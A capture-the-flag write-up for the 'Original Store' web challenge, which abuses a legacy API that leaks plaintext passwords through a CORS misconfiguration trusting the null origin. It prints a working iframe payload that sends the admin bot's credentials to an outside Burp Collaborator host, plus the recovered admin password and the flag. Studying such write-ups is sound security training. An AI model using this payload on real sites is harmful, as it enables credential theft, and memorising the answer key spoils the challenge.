Original Store
by shreyas-sriram
Hi! Check out our car dealership platform - the Original Store at Store. We also have a contest running right now and who has the best car wins! You can send us your car’s images at bot.
Solution
- Login process uses an endpoint
/api/v3/authorize.php
for authenticating credentials - This endpoint returns a JSON response with
username
andpassword
in plain text, however the password value was removed due to security reasons - Trying an older API,
/api/v1/authorize.php
, reveals thepassword
in plain text - On closer inspection, this endpoint also had a CORS misconfiguration with trusted
null
origin - The following HTML can be used to exploit the vulnerability
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','http://localhost:80/api/v1/authorize.php',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='https://leet.burpcollaborator.net/flag?c='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
- Host the above HTML and send the link to the admin bot, wait to receive the
admin password
in Burp Collaborator
// admin password
V3ryStr0ngP4ssw0rdF0rN0Cr4ck
- Login as admin to obtain the flag
Flag
zh3r0{4dm1n_l0ves_0nly_0r1g1n4ls_br0}